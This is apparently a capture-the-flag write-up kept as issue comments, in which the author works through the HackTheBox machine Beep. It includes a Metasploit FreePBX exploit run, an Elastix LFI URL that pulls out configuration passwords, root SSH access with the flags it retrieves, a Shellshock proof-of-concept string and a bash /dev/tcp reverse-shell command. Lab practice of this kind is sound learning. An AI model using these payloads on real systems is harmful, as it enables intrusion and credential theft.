/program/localization/ro_RO/labels.inc (Status: 200) [Size: 12302]
/program/localization/ro_RO/messages.inc (Status: 200) [Size: 7831]
/program/localization/ru_RU/labels.inc (Status: 200) [Size: 15162]
/program/localization/ru_RU/messages.inc (Status: 200) [Size: 9973]
/program/localization/si_LK/labels.inc (Status: 200) [Size: 11900]
/program/localization/si_LK/messages.inc (Status: 200) [Size: 8159]
/program/localization/sk_SK/labels.inc (Status: 200) [Size: 11138]
/program/localization/sk_SK/messages.inc (Status: 200) [Size: 6801]
/program/localization/sl_SI/labels.inc (Status: 200) [Size: 11901]
/program/localization/sl_SI/messages.inc (Status: 200) [Size: 7393]
/program/localization/sq_AL/labels.inc (Status: 200) [Size: 7997]
/program/localization/sq_AL/messages.inc (Status: 200) [Size: 5187]
/program/localization/sr_CS/labels.inc (Status: 200) [Size: 9909]
/program/localization/sr_CS/messages.inc (Status: 200) [Size: 6627]
/program/localization/sv_SE/labels.inc (Status: 200) [Size: 12076]
/program/localization/sv_SE/messages.inc (Status: 200) [Size: 7383]
/program/localization/th_TH/labels.inc (Status: 200) [Size: 9635]
/program/localization/th_TH/messages.inc (Status: 200) [Size: 6977]
/program/localization/tr_TR/labels.inc (Status: 200) [Size: 11949]
/program/localization/tr_TR/messages.inc (Status: 200) [Size: 7237]
/program/localization/uk_UA/labels.inc (Status: 200) [Size: 14500]
/program/localization/uk_UA/messages.inc (Status: 200) [Size: 8518]
/program/localization/vi_VN/labels.inc (Status: 200) [Size: 7185]
/program/localization/vi_VN/messages.inc (Status: 200) [Size: 3994]
/program/localization/zh_CN/labels.inc (Status: 200) [Size: 10761]
/program/localization/zh_CN/messages.inc (Status: 200) [Size: 5986]
/program/localization/zh_TW/labels.inc (Status: 200) [Size: 11401]
/program/localization/zh_TW/messages.inc (Status: 200) [Size: 6267]
/program/steps/addressbook/copy.inc (Status: 200) [Size: 2063]
/program/steps/addressbook/delete.inc (Status: 200) [Size: 2091]
/program/steps/addressbook/edit.inc (Status: 200) [Size: 3793]
/program/steps/addressbook/export.inc (Status: 200) [Size: 1615]
/program/steps/addressbook/func.inc (Status: 200) [Size: 6723]
/program/steps/addressbook/import.inc (Status: 200) [Size: 5860]
/program/steps/addressbook/list.inc (Status: 200) [Size: 1389]
/program/steps/addressbook/mailto.inc (Status: 200) [Size: 1857]
/program/steps/addressbook/save.inc (Status: 200) [Size: 4310]
/program/steps/addressbook/search.inc (Status: 200) [Size: 1831]
/program/steps/addressbook/show.inc (Status: 200) [Size: 2612]
/program/steps/mail/addcontact.inc (Status: 200) [Size: 2360]
/program/steps/mail/attachments.inc (Status: 200) [Size: 5334]
/program/steps/mail/autocomplete.inc (Status: 200) [Size: 1696]
/program/steps/mail/check_recent.inc (Status: 200) [Size: 3248]
/program/steps/mail/compose.inc (Status: 200) [Size: 33386]
/program/steps/mail/folders.inc (Status: 200) [Size: 2597]
/program/steps/mail/get.inc (Status: 200) [Size: 4743]
/program/steps/mail/getunread.inc (Status: 200) [Size: 1550]
/program/steps/mail/move_del.inc (Status: 200) [Size: 4658]
/program/steps/mail/headers.inc (Status: 200) [Size: 1632]
/program/steps/mail/list.inc (Status: 200) [Size: 3233]
/program/steps/mail/mark.inc (Status: 200) [Size: 4706]
/program/steps/mail/search.inc (Status: 200) [Size: 3887]
/program/steps/mail/func.inc (Status: 200) [Size: 49403]
/program/steps/mail/sendmail.inc (Status: 200) [Size: 20547]
/program/steps/mail/sendmdn.inc (Status: 200) [Size: 1570]
/program/steps/mail/show.inc (Status: 200) [Size: 8718]
/program/steps/mail/viewsource.inc (Status: 200) [Size: 2068]
/program/steps/settings/edit_identity.inc (Status: 200) [Size: 5135]
/program/steps/settings/edit_prefs.inc (Status: 200) [Size: 2451]
/program/steps/settings/func.inc (Status: 200) [Size: 24906]
/program/steps/settings/identities.inc (Status: 200) [Size: 1697]
/program/steps/settings/save_identity.inc (Status: 200) [Size: 3950]
/program/steps/settings/save_prefs.inc (Status: 200) [Size: 10540]
/robots.txt           (Status: 200) [Size: 26]
/SQL/mssql.initial.sql (Status: 200) [Size: 7801]
/SQL/mysql.initial.sql (Status: 200) [Size: 4492]
/SQL/postgres.initial.sql (Status: 200) [Size: 5357]
/SQL/sqlite.initial.sql (Status: 200) [Size: 3625]
/temp/.htaccess       (Status: 403) [Size: 297]
/UPGRADING            (Status: 200) [Size: 4668]
Progress: 2379 / 2380 (99.96%)
===============================================================
Finished
===============================================================
roaris commented 3 months ago

A lot came up, but I don't know what I should be looking at. I searched exploit-db for Apache 2.2.3, Cyrus and OpenSSH 4.3, but nothing usable turned up.

roaris commented 3 months ago

I'm stuck, so switching to Guided Mode.

Q. Which Linux distribution is the target machine running?

A. CentOS (it's in the nmap results)

Q. What version of TLS is the web application on TCP port 443 using? Hint : Running the curl command with one or more verbose flags (-v) can yield headers and other information about the underlying service. If Firefox won't load the page, you can edit security.tls.version.min to 1 in about:config.

A. 1.0

Looking at the curl output, it also says 1.3, though. I don't know how to read it. sslscan gave the result below. I guess the client first tried to use 1.3, but the server didn't support it, so it ended up at 1.0.

$ sslscan 10.10.10.7
Version: 2.1.3-static
OpenSSL 3.0.12 24 Oct 2023

Connected to 10.10.10.7

Testing SSL server 10.10.10.7 on port 443 using SNI name 10.10.10.7

  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     enabled
TLSv1.0   enabled
TLSv1.1   disabled
TLSv1.2   disabled
TLSv1.3   disabled

  TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression enabled (CRIME)

  Heartbleed:
TLSv1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
Accepted  TLSv1.0  112 bits  DHE-RSA-DES-CBC3-SHA          DHE 1024 bits
Accepted  TLSv1.0  256 bits  AES256-SHA
Accepted  TLSv1.0  128 bits  AES128-SHA
Accepted  TLSv1.0  112 bits  DES-CBC3-SHA
Accepted  TLSv1.0  128 bits  TLS_RSA_WITH_RC4_128_MD5
Accepted  TLSv1.0  128 bits  TLS_RSA_WITH_RC4_128_SHA
Accepted  TLSv1.0  56 bits   TLS_RSA_WITH_DES_CBC_SHA
Accepted  TLSv1.0  56 bits   TLS_DHE_RSA_WITH_DES_CBC_SHA

  SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength:    1024

Subject:  localhost.localdomain
Issuer:   localhost.localdomain

Not valid before: Apr  7 08:22:08 2017 GMT
Not valid after:  Apr  7 08:22:08 2018 GMT
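To make the sslscan result and the curl question above concrete, here is an added example (not part of the original issue) that parses the protocol table quoted above and models TLS version selection: the client advertises a [min, max] range in its ClientHello and the server picks the highest version both sides support, or the handshake fails. The Firefox pref values and the client ranges are the example's own assumptions; the protocol table is copied from the sslscan output.

```python
import re

# Constructed from the "SSL/TLS Protocols" section of the sslscan output above.
SSLSCAN_PROTOCOLS = """\
SSLv2     disabled
SSLv3     enabled
TLSv1.0   enabled
TLSv1.1   disabled
TLSv1.2   disabled
TLSv1.3   disabled
"""

# Version ordering used for comparisons (oldest first).
ORDER = ["SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1", "TLSv1.2", "TLSv1.3"]

# Firefox's security.tls.version.min/max pref values map onto versions like this.
FIREFOX_PREF = {1: "TLSv1.0", 2: "TLSv1.1", 3: "TLSv1.2", 4: "TLSv1.3"}


def parse_enabled(text):
    """Return the set of versions sslscan reports as 'enabled'."""
    enabled = set()
    for line in text.splitlines():
        m = re.match(r"(\S+)\s+(enabled|disabled)\s*$", line)
        if m and m.group(2) == "enabled":
            enabled.add(m.group(1))
    return enabled


def negotiate(client_min, client_max, server_enabled):
    """Version selection: the server picks the highest version that is both
    inside the client's [min, max] range and enabled on its side.
    None means the handshake fails (the browser shows a protocol error)."""
    lo, hi = ORDER.index(client_min), ORDER.index(client_max)
    common = [v for v in ORDER[lo:hi + 1] if v in server_enabled]
    return common[-1] if common else None


def firefox_result(version_min, server_enabled):
    """What Firefox negotiates for a given security.tls.version.min
    (security.tls.version.max left at its default of 4, i.e. TLS 1.3)."""
    return negotiate(FIREFOX_PREF[version_min], FIREFOX_PREF[4], server_enabled)


if __name__ == "__main__":
    server = parse_enabled(SSLSCAN_PROTOCOLS)                    # {'SSLv3', 'TLSv1.0'}
    print("Firefox default (min=3):", firefox_result(3, server))  # None -> page won't load
    print("Firefox with min=1:    ", firefox_result(1, server))  # TLSv1.0
    # curl -v offers up to TLS 1.3 in its ClientHello but, as seen above, still
    # accepts 1.0, so its log shows both versions while the server settles on TLSv1.0.
    print("curl (1.0..1.3):       ", negotiate("TLSv1.0", "TLSv1.3", server))
```

The only enabled versions are SSLv3 and TLSv1.0, so a client whose minimum is TLS 1.2 has no common version and the connection fails before any HTTP is sent.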
roaris commented 3 months ago

Q. What is the name of the software that's hosting a webserver on 443?

elastix

Q. Which Elastix endpoint is vulnerable to a Local File Inclusion? Hint : Search for vulnerabilities using resources such as Exploit-DB. There's a lot in Elastix - we'll focus on 37637.

Ah, I should have searched exploit-db for elastix.

A. /vtigercrm/graph.php https://www.exploit-db.com/exploits/37637

But there's also a remote code execution one rather than the LFI; can't I try this? https://www.exploit-db.com/exploits/18650

roaris commented 3 months ago
msf6 > search elastix

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  exploit/unix/http/freepbx_callmenum  2012-03-20       manual  No     FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/freepbx_callmenum

msf6 > use exploit/unix/http/freepbx_callmenum
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(unix/http/freepbx_callmenum) > options

Module options (exploit/unix/http/freepbx_callmenum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   EXTENSION  0-100            yes       A range of Local extension numbers
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
                                         ics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.23.73.202    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

msf6 exploit(unix/http/freepbx_callmenum) > set RHOSTS 10.10.10.7
RHOSTS => 10.10.10.7
msf6 exploit(unix/http/freepbx_callmenum) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(unix/http/freepbx_callmenum) > set RPORT 443
RPORT => 443
msf6 exploit(unix/http/freepbx_callmenum) > set LHOST 10.10.16.4
LHOST => 10.10.16.4
msf6 exploit(unix/http/freepbx_callmenum) > exploit

[*] Started reverse TCP handler on 10.10.16.4:4444
[*] 10.10.10.7:443 - Sending evil request with range 0
[*] 10.10.10.7:443 - Sending evil request with range 1
[*] 10.10.10.7:443 - Sending evil request with range 2
[*] 10.10.10.7:443 - Sending evil request with range 3
[*] 10.10.10.7:443 - Sending evil request with range 4
[*] 10.10.10.7:443 - Sending evil request with range 5
[*] 10.10.10.7:443 - Sending evil request with range 6
[*] 10.10.10.7:443 - Sending evil request with range 7
[*] 10.10.10.7:443 - Sending evil request with range 8
[*] 10.10.10.7:443 - Sending evil request with range 9
[*] 10.10.10.7:443 - Sending evil request with range 10
[*] 10.10.10.7:443 - Sending evil request with range 11
[*] 10.10.10.7:443 - Sending evil request with range 12
[*] 10.10.10.7:443 - Sending evil request with range 13
[*] 10.10.10.7:443 - Sending evil request with range 14
[*] 10.10.10.7:443 - Sending evil request with range 15
[*] 10.10.10.7:443 - Sending evil request with range 16
[*] 10.10.10.7:443 - Sending evil request with range 17
[*] 10.10.10.7:443 - Sending evil request with range 18
[*] 10.10.10.7:443 - Sending evil request with range 19
[*] 10.10.10.7:443 - Sending evil request with range 20
[*] 10.10.10.7:443 - Sending evil request with range 21
[*] 10.10.10.7:443 - Sending evil request with range 22
[*] 10.10.10.7:443 - Sending evil request with range 23
[*] 10.10.10.7:443 - Sending evil request with range 24
[*] 10.10.10.7:443 - Sending evil request with range 25
[*] 10.10.10.7:443 - Sending evil request with range 26
[*] 10.10.10.7:443 - Sending evil request with range 27
[*] 10.10.10.7:443 - Sending evil request with range 28
[*] 10.10.10.7:443 - Sending evil request with range 29
[*] 10.10.10.7:443 - Sending evil request with range 30
...

Looks like it's not working.

roaris commented 3 months ago

Q. What is the name of the FreePBX configuration file that contains the database configuration? Hint : The POC from searchsploit with ID 37637 shows grabbing this file.

amportal.conf

I don't understand why we focus on LFI. https://qiita.com/elliot_tk/items/6db38c857f77c7e9b830 says: "LFI can execute files, whereas directory traversal only allows viewing them. Put simply, it comes down to a difference in the function used. LFI is generally considered the more serious vulnerability."

I see.

roaris commented 3 months ago

Does this LFI lead to RCE? Looking at https://www.exploit-db.com/exploits/37637, it doesn't seem like it.

roaris commented 3 months ago

Q. What additional flag is needed when attempting to SSH as root to the target machine due to a "no matching key exchange method found" error? It starts with -o and ends with -sha1. Hint : Because this system is very old, modern systems consider it suspect to connect to them. Search for the error and there will be forums giving suggestions for how to connect. You can use the LFI vulnerability from the previous question

I don't understand what this means, so I'll look at a writeup.

roaris commented 3 months ago

https://paichan-it.hatenablog.com/entry/2020/05/01/221552

Apparently you access /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action, which is what https://www.exploit-db.com/exploits/37637 describes.

There's a lot of stuff written there, but it's hard to read, so apparently you look at the page source. (I wouldn't have known there was important information here, and I'd probably give up the moment it got hard to read.)

AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

That's what it says, and I was able to log in to https://10.10.10.7 with admin / jEhdIekWmdjE. But that doesn't get me into the server. (← Let's look for somewhere to upload a reverse shell.)

Then it turns out you try SSH login with these.

roaris commented 3 months ago
$ ssh asteriskuser@10.10.10.7
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

https://gametech.vatchlog.com/2023/06/02/ssh-bibou/#toc2 says you should specify the key exchange method with an option.

$ ssh asteriskuser@10.10.10.7 -oKexAlgorithms=diffie-hellman-group-exchange-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

$ ssh asteriskuser@10.10.10.7 -oKexAlgorithms=diffie-hellman-group14-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

$ ssh asteriskuser@10.10.10.7 -oKexAlgorithms=diffie-hellman-group1-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

$ ssh admin@10.10.10.7 -oKexAlgorithms=diffie-hellman-group-exchange-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

$ ssh admin@10.10.10.7 -oKexAlgorithms=diffie-hellman-group14-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

$ ssh admin@10.10.10.7 -oKexAlgorithms=diffie-hellman-group1-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

No good.

roaris commented 3 months ago

Q. What additional flag is needed when attempting to SSH as root to the target machine due to a "no matching key exchange method found" error? It starts with -o and ends with -sha1. Hint : Because this system is very old, modern systems consider it suspect to connect to them. Search for the error and there will be forums giving suggestions for how to connect. You can use the LFI vulnerability from the previous question

In the end the answer to this question is unclear. It's not -oKexAlgorithms=diffie-hellman-group-exchange-sha1, nor -oKexAlgorithms=diffie-hellman-group14-sha1, nor -oKexAlgorithms=diffie-hellman-group1-sha1.

Actually, searching for -oKexAlgorithms turns up nothing at all.

Apparently the answer is -oKexAlgorithms=+diffie-hellman-group1-sha1 https://unix.stackexchange.com/questions/340844/how-to-enable-diffie-hellman-group1-sha1-key-exchange-on-debian-8-0 Well, that doesn't work either, though.

$ ssh admin@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
roaris commented 3 months ago

Apparently this is a different error in its own right. https://qiita.com/nanbuwks/items/47248b6ed2d37086e40d Adding -oHostKeyAlgorithms=+ssh-rsa as well finally got it through.

$ ssh admin@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa
The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg1pEJ0XXD5nFEjki/hI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.7' (RSA) to the list of known hosts.
admin@10.10.10.7's password:
Permission denied, please try again.
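The three SSH errors in the comments above come from two negotiation stages and from how OpenSSH list options are applied. The following added example (not from the original issue) models both: RFC 4253 section 7.1 algorithm selection (first entry on the client's list that the server also offers) and the OpenSSH syntax where a bare value replaces the default list while `+`, `-` and `^` append to, remove from or prepend to it. The server lists are the "Their offer:" values quoted above; the client default lists are constructed, shortened stand-ins for a modern OpenSSH client.

```python
# Constructed, shortened stand-ins for a modern OpenSSH client's defaults: no
# SHA-1 key exchange and no ssh-rsa (SHA-1 signature) host keys are offered.
CLIENT_DEFAULT_KEX = ["curve25519-sha256", "diffie-hellman-group16-sha512"]
CLIENT_DEFAULT_HOSTKEY = ["ssh-ed25519", "rsa-sha2-512", "rsa-sha2-256"]

# The server's lists, as printed after "Their offer:" in the errors above.
SERVER_KEX = ["diffie-hellman-group-exchange-sha1",
              "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"]
SERVER_HOSTKEY = ["ssh-rsa", "ssh-dss"]


def apply_option(default, value):
    """OpenSSH algorithm-list option syntax: a bare list REPLACES the default,
    '+a,b' appends to it, '-a,b' removes from it, '^a,b' puts a,b first."""
    items = value.lstrip("+-^").split(",")
    if value.startswith("+"):
        return default + [a for a in items if a not in default]
    if value.startswith("-"):
        return [a for a in default if a not in items]
    if value.startswith("^"):
        return items + [a for a in default if a not in items]
    return items


def negotiate(client, server):
    """RFC 4253 section 7.1: the first algorithm in the client's preference
    list that the server also supports wins; None means 'Unable to negotiate'."""
    return next((a for a in client if a in server), None)


def connect(kex_opt=None, hostkey_opt=None):
    """Walk the two negotiation stages the errors above come from and return
    either the failure message or the agreed (kex, hostkey) pair."""
    kex = apply_option(CLIENT_DEFAULT_KEX, kex_opt) if kex_opt else CLIENT_DEFAULT_KEX
    hostkey = (apply_option(CLIENT_DEFAULT_HOSTKEY, hostkey_opt)
               if hostkey_opt else CLIENT_DEFAULT_HOSTKEY)
    chosen_kex = negotiate(kex, SERVER_KEX)
    if chosen_kex is None:
        return "no matching key exchange method found"
    chosen_hostkey = negotiate(hostkey, SERVER_HOSTKEY)
    if chosen_hostkey is None:
        return "no matching host key type found"
    return chosen_kex, chosen_hostkey


if __name__ == "__main__":
    print(connect())                                  # first error in the thread
    print(connect("diffie-hellman-group1-sha1"))      # kex OK, host key type fails
    print(connect("+diffie-hellman-group1-sha1"))     # same result, but defaults kept
    print(connect("+diffie-hellman-group1-sha1", "+ssh-rsa"))
    # -> ('diffie-hellman-group1-sha1', 'ssh-rsa'): the combination that finally worked
```

The practical difference between the bare value and the `+` form is hygiene: the bare value throws away the modern defaults for every host, while `+` keeps them and only adds the legacy algorithm, which is why it belongs in a per-host block of ~/.ssh/config rather than a global setting.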
roaris commented 3 months ago

In the end the username is apparently neither asteriskuser nor admin, but root.

$ ssh root@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa
root@10.10.10.7's password:
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# ls
anaconda-ks.cfg            install.log         postnochroot  webmin-1.570-1.noarch.rpm
elastix-pr-2.2-1.i386.rpm  install.log.syslog  root.txt
[root@beep ~]# cat root.txt
b61afc9ba02d807b9ede9d7e9c170eac
[root@beep ~]# cd /home
[root@beep home]# ls
fanis  spamfilter
[root@beep home]# cd fanis
[root@beep fanis]# ls
user.txt
[root@beep fanis]# cat user.txt
966c9eecc2a280bcebc24b6a15766b91
roaris commented 3 months ago

Summary of the solution

  1. The server only supports TLS version 1.0, so the browser can't access it. Enable TLS version 1.0 from Firefox's about:config (not sure about Chrome).
  2. An application called elastix is in use, so search searchsploit for elastix.
  3. An LFI vulnerability comes up, so take a look at that code for a start.
  4. Access the URL in the code.
  5. The HTML is hard to read, so look at the source.
  6. Some username and password are written there, so try SSH login.
  7. The server's SSH key exchange algorithm is old and errors out, so run it with options.
  8. In the end, the SSH username is root.

Isn't there a lot of mind-reading involved? I don't feel like I could solve this on my own.

roaris commented 3 months ago

Guided Mode is still going.

Q. There are many other ways to root Beep. These questions after the root flag are hints to help identify them. What is the 2012 CVE ID for pre-authentication remote code execution vulnerability in FreePBX / Elastix? Hint : Searching for "elastix" in searchsploit or ExploitDB will find this. Its exploitdb-id is 18650.

A. CVE-2012-4869

The one I tried earlier that didn't work.

Q. What password from the PBX config also works to log in as root to the Webmin application listening on TCP 10000? Hint : Try the different passwords from that file. Once logged in as root, it's possible to create a task and get code execution and a shell.

A. jEhdIekWmdjE

It says "create a task and get code execution and a shell", but is there such a place?

Q. What is the common name for the set of 2014 CVEs where this is a POC exploit: () { :; };sleep 10? Hint : It's also known as bashdoor, but we're looking for the name that starts with 's'. Putting this into the user-agent string of a CGI request will execute a ten second sleep. That same payload can be modified to get a shell.

A. shellshock

Is CGI relevant this time?

Q. What is the full path to the asterisk user's mail folder on Beep? Hint : Because there's a PHP LFI vulnerability in Beep, if we can get a webshell onto the box and then include it, we can get execution that way. Try sending asterisk an email with a webshell.

Is there somewhere that allows file uploads?

roaris commented 3 months ago

Found a place where commands can be executed. With nc -lvp 4444 running locally, I ran sh -i >& /dev/tcp/10.10.16.4/4444 0>&1. Somehow it didn't work.